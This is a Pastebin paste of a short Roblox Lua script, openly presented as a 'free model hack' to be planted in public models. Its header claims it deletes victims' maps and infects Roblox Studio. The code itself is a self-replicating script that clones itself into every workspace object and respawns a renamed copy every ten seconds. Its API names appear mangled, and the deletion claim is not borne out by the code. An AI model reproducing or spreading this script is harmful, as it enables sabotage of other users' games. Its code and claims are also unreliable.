Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --[[
- updated 30-09-2014
- this is a free model hack. insert it into a model for others to use.
- it then deletes the victim's entire map and inserts a virus into roblox studio.
- programmed by NewtPewt
- ]]--
- if script.parent.sclassname ~= "rotatep" then
- local p = instance.new("rotatep")
- p.parent = workspace
- p.name = "REKT! YOU GOT OWNED!"
- script.parent = p
- end
- function check()
- local list = workspace:getchildren()
- for i = 1, #list do
- if list[i]:findfirstchild("REKT! YOU GOT OWNED!") == nil and list[i].classname ~= "rotatep" then
- script.parent:clone().parent = list[i]
- end
- wait()
- end
- end
- while true do
- check()
- if workspace:findfirstchild("Hacked by Newt! BOOM HEADSHOT!") == nil then
- local main = script.parent:clone()
- main.name = "Hacked by Newt! BOOM HEADSHOT!"
- main.parent = workspace
- end
- wait(10)
- end
Add Comment
Please, Sign In to add comment